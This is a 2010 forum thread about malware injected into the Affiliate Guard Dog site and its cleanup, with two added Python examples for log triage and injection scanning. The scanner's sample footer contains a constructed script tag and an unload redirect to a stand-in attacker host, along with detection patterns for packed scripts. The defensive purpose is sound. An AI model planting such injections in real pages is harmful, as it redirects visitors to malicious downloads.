Affiliate Guard Dog - Malware - Action Taken

Discussion in 'General Casino Affiliate Area' started by Webzcas, Nov 3, 2010.

  1.  
    Webzcas

    Webzcas Affiliate Guard Dog Member

    Messages:
    392
    Likes Received:
    167
    Joined:
    Nov 13, 2008
    Hi all,

    As you know, since the beginning of last week Affiliate Guard Dog was infected by malware, the purpose of which was to redirect visitors to the site to third-party sites with download trojans.

    As I host AGD on my server, and after discussing with Andy, I felt it only right and proper to update you all as to the current state of play.

    We have ascertained the site was exploited back on the 22nd October, and several backdoor scripts were also left on the site at this time, with the malware payload being activated on the 24th October.

    I can confirm, though, from analysing the FTP logs and other backend logs, that no actual breach as such of the site occurred. The malware was inserted via an injection, exploiting some code on the site.

    So what have we done to resolve this?

    It quickly became apparent that restoring from the clean monthly backup of 3rd October and patching all software on the site to the latest releases was not sufficient on its own.

    I have therefore employed the services of a third-party company, Sucuri.net, who achieved fame for exposing weaknesses with GoDaddy's and Network Solutions' own websites.

    Sucuri have, in the past 48 hours, performed a rigorous scan of the entire AGD site and have removed all backdoors that were uploaded by the hacker. They are also constantly monitoring the site for potential vulnerabilities and, more importantly, any malware infections going forward.

    [IMG]

    Click the badge above to verify.

    However, this brings us to the issue of how this attack was performed in the first place. Sucuri currently have the logs for AGD and its subdomains, and Andy and I are hopeful they can assist us in identifying the IP address or addresses of those responsible.

    It is possible it was a bot, but hopefully, if the attacks were personal, the individual or individuals responsible have tripped up.

    On another note, I can confirm, unfortunately, that the virus that infected Natalie's PC was a result of the malware on this site. The exact same trojan took out my own netbook.

    Andy and I fully apologise for this happening. But rest assured, the site is, and will continue to remain, secure moving on.

    Finally, if any member of AGD is au fait with web logs and would like to put their pair of eyes over the logs to see if they can help identify the point of attack, please PM me or Andy.

    Thanks

    Dave
     
    Last edited: Nov 3, 2010
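    A reader taking Dave up on the request above would typically narrow the web logs to the window the post gives (exploited on the 22nd, payload live by the 24th) and look for requests that execute scripts the site does not normally serve. The block below is an added example written for this thread, not code from Dave, Andy, AGD or Sucuri: it parses combined-format access-log lines (the sample lines are constructed, using documentation IP ranges, and are not AGD's real logs), keeps requests inside the date window, flags POSTs and requests for `.php` paths outside an assumed allowlist, and groups the hits by client IP with the earliest timestamp per path so a dropped backdoor and whoever first called it stand out together.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample access-log lines in Apache/nginx combined format.
# These are NOT AGD's real logs; IPs come from documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Oct/2010:09:14:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [22/Oct/2010:03:41:10 +0000] "GET /forum/index.php HTTP/1.1" 200 7210 "-" "Mozilla/4.0"
198.51.100.23 - - [22/Oct/2010:03:42:55 +0000] "POST /images/cache.php HTTP/1.1" 200 15 "-" "Mozilla/4.0"
203.0.113.7 - - [23/Oct/2010:11:02:30 +0000] "GET /forum/index.php HTTP/1.1" 200 7210 "-" "Mozilla/5.0"
198.51.100.23 - - [24/Oct/2010:02:10:01 +0000] "POST /images/cache.php HTTP/1.1" 200 22 "-" "Mozilla/4.0"
192.0.2.9 - - [26/Oct/2010:08:00:00 +0000] "POST /images/cache.php HTTP/1.1" 200 22 "-" "curl/7.19"
"""

# The window the post gives: exploited 22nd October, payload live by the 24th.
WINDOW_START = datetime(2010, 10, 22, tzinfo=timezone.utc)
WINDOW_END = datetime(2010, 10, 24, 23, 59, 59, tzinfo=timezone.utc)

# Scripts the site is known to serve (an assumed allowlist for this example;
# in practice, build it from the file listing of a clean backup).
KNOWN_SCRIPTS = {"/index.php", "/forum/index.php"}

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["target"].split("?", 1)[0]  # drop the query string
    return rec


def suspicious_requests(log_text, start=WINDOW_START, end=WINDOW_END, known=KNOWN_SCRIPTS):
    """Requests inside [start, end] that are POSTs or execute a .php path not in the allowlist."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not (start <= rec["ts"] <= end):
            continue
        unknown_script = rec["path"].endswith(".php") and rec["path"] not in known
        if rec["method"] == "POST" or unknown_script:
            hits.append(rec)
    return hits


def by_ip(hits):
    """Group hits as {ip: {path: {"first": earliest timestamp, "count": n}}}."""
    summary = defaultdict(dict)
    for rec in hits:
        entry = summary[rec["ip"]].setdefault(rec["path"], {"first": rec["ts"], "count": 0})
        entry["count"] += 1
        if rec["ts"] < entry["first"]:
            entry["first"] = rec["ts"]
    return dict(summary)


if __name__ == "__main__":
    for ip, paths in by_ip(suspicious_requests(SAMPLE_LOG)).items():
        for path, info in paths.items():
            print(f"{ip:16} {path:24} first={info['first']:%d/%b/%Y %H:%M:%S} hits={info['count']}")
```

On the sample data the only client left after filtering is 198.51.100.23, first seen POSTing to `/images/cache.php` on the 22nd, which is exactly the kind of path (a script under an images directory, absent from the clean backup) worth checking against the backdoors Sucuri removed. The earliest timestamp per path is also a useful cross-check against file modification times on the compromised host.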
  2.  
    inspiration

    inspiration Affiliate Guard Dog Member

    Messages:
    975
    Likes Received:
    167
    Joined:
    Feb 20, 2009
    Thanks, Webzcas, for taking security to a higher level; hopefully these trojan things remain in the past now.

    I secured my PC with Avast + McAfee antivirus. I urge everyone to do so too, because these things can happen at any site and you will be better protected that way.


    :)
     
  3.  
    Engineer

    Engineer Super Moderator

    Messages:
    2,443
    Likes Received:
    200
    Joined:
    Dec 14, 2006
    Thanks for the update, Dave. I hope you will be able to find whoever did this...
     
  4.  
    bonustreak

    bonustreak Administrator Staff Member

    Messages:
    3,887
    Likes Received:
    346
    Joined:
    Dec 15, 2006
    Thank you Dave and Andy for dealing with this so swiftly and vigorously!
     
  5.  
    tryme1

    tryme1 Affiliate Guard Dog Member

    Messages:
    681
    Likes Received:
    56
    Joined:
    Mar 2, 2009
    I also have the same combination of security options (although that irritating woman's voice on Avast intoning 'your virus database has been updated' drives me mad!).

    I'm glad that everything is resolved and normal scheduling has been resumed :)
     
  6.  
    SlotsOfFortune-Affiliates

    SlotsOfFortune-Affiliates Affiliate Guard Dog Member

    Messages:
    47
    Likes Received:
    0
    Joined:
    Jun 8, 2008
    Thank you for taking care of this! The virus was scary, but I am glad we are all safe now.

    Natalie.
     
  7.  
    inspiration

    inspiration Affiliate Guard Dog Member

    Messages:
    975
    Likes Received:
    167
    Joined:
    Feb 20, 2009
    Yes, but they are prob the best at this time. Avast found many viruses that McAfee just could not.
     
  8.  
    Vladi

    Vladi Affiliate Guard Dog Member

    Messages:
    772
    Likes Received:
    114
    Joined:
    Feb 4, 2008
    Thanks guys, sounds like it was a nasty job trying to fix.

    And boy am I happy I have a Mac ;) /runs
     
  9.  
    inspiration

    inspiration Affiliate Guard Dog Member

    Messages:
    975
    Likes Received:
    167
    Joined:
    Feb 20, 2009
    I see an error on the AGD main page; maybe you want to check that file.


    Hope it is nothing to worry about.
     
  10.  
    Guard Dog

    Guard Dog Guard Dog Staff Member

    Messages:
    7,727
    Likes Received:
    1,152
    Joined:
    Dec 13, 2006
    No, nothing to worry about. It is simply a missing banner. The banner system was in one location and was hacked (a long time ago) and was removed in its entirety. As a result there is a 404 error when trying to retrieve the banner.

    Will fix :) thanks for the reminder
     
  11.  
    Baccarat

    Baccarat Affiliate Guard Dog Member

    Messages:
    74
    Likes Received:
    0
    Joined:
    Feb 15, 2010
    Everyone should download Malwarebytes. It detects malware instantly on your computer and can remove it. I got infected a year ago from clicking on a pop-up banner and had to use this software.

    Glad to see AGD is back in good health =).
     
  12.  
    lots0

    lots0 Affiliate Guard Dog Member

    Messages:
    595
    Likes Received:
    2
    Joined:
    Sep 17, 2009
    Hi guys,

    Thanks for the info on Sucuri.net.

    One of my sites got hit by a redirect injection too.

    Pretty damn sneaky. It is redirecting to p0rn sites after a page closes in my CMS.

    Got the CMS shut down right now, to clean it out. Looks like they hit me around the 25th of October.
     
  13.  
    lots0

    lots0 Affiliate Guard Dog Member

    Messages:
    595
    Likes Received:
    2
    Joined:
    Sep 17, 2009
    The one that got me was "tizer.js" and some cross-site scripting holes, that just got closed...
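    lots0's two posts above describe the same pattern on his own site: a script reference ("tizer.js") planted in the CMS output that sends the visitor elsewhere when a page is closed. When cleaning up, the first question is which files carry the injection. The block below is an added example written for this thread, not lots0's, AGD's or Sucuri's code: it walks a web root and flags script tags whose host is outside an assumed allowlist, the "tizer.js" name from the thread, `unload`/`beforeunload` handlers that rewrite `location` (the "after a page closes" behaviour), and packed `eval(unescape(...))` blobs. The sample files, the allowlist and the 203.0.113.50 host are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Hosts the site is expected to load scripts from (assumed allowlist for the example).
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "ajax.googleapis.com"}

# Indicators: the "tizer.js" name from the thread, a redirect fired from an
# unload handler, and the eval(unescape(...)) wrapper common in packed injections.
INDICATORS = [
    ("known-bad-script", re.compile(r"tizer\.js", re.I)),
    ("unload-redirect", re.compile(r"on(?:before)?unload\s*=[^;]*?location", re.I | re.S)),
    ("packed-script", re.compile(r"eval\s*\(\s*unescape\s*\(", re.I)),
]
SCRIPT_SRC = re.compile(r"<script[^>]+src\s*=\s*['\"]?(?P<src>[^'\" >]+)", re.I)


def scan_text(text, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (indicator, evidence) pairs found in one file's contents."""
    findings = []
    for m in SCRIPT_SRC.finditer(text):
        host = urlparse(m.group("src")).hostname
        if host and host not in allowed_hosts:
            findings.append(("unexpected-script-host", host))
    for name, pattern in INDICATORS:
        for m in pattern.finditer(text):
            findings.append((name, m.group(0)[:60]))
    return findings


def scan_tree(root, suffixes=(".html", ".htm", ".php", ".js", ".tpl")):
    """Scan every template/script file under root; map relative path -> findings."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            findings = scan_text(path.read_text(errors="replace"))
            if findings:
                results[str(path.relative_to(root))] = findings
    return results


def build_sample_tree(root):
    """Write constructed sample files: a clean page and a footer carrying an injection."""
    root = Path(root)
    (root / "inc").mkdir(parents=True, exist_ok=True)
    (root / "index.html").write_text(
        '<html><head><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js">'
        '</script></head><body>Welcome</body></html>\n'
    )
    # Constructed injected footer: external script from an unlisted host plus an
    # unload handler that redirects. 203.0.113.50 is a documentation address.
    (root / "inc" / "footer.php").write_text(
        '<?php echo "footer"; ?>\n'
        '<script src="http://203.0.113.50/js/tizer.js"></script>\n'
        '<script>window.onbeforeunload = function(){ window.location = "http://203.0.113.50/x"; };</script>\n'
    )
    return root


def run_demo():
    """Build the sample tree in a temp dir and scan it; returns the findings map."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_tree(tmp))


if __name__ == "__main__":
    for rel_path, findings in run_demo().items():
        for name, evidence in findings:
            print(f"{rel_path}: {name}: {evidence}")
```

Point `scan_tree` at the site's document root (and, for a CMS, at its template and theme directories) and compare the flagged files against a clean backup; a file the backup does not contain, or one whose only difference is a script tag, is the usual sign of the injection rather than a legitimate change. The host allowlist is the part worth maintaining carefully, since most of what this finds is simply "a script loads from somewhere we never chose".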
     
  14.  
    Corgi

    Corgi Affiliate Guard Dog Member

    Messages:
    15
    Likes Received:
    0
    Joined:
    Jul 1, 2010
    What a bummer! Man, it sucks that people want to ruin a good community like this, but I am glad you all have resolved everything. I guess that is the way of the world, especially when you are reporting the facts and keeping affiliates informed. I am sure there are a lot of blacklisted sites that would love to take this site down...

    Keep up the good fight.
     
  15.  
    bc518

    bc518 Affiliate Guard Dog Member

    Messages:
    51
    Likes Received:
    0
    Joined:
    Nov 29, 2008
    Was the forum system vBulletin exploited? It seems every forum system has some bugs like any OS.
     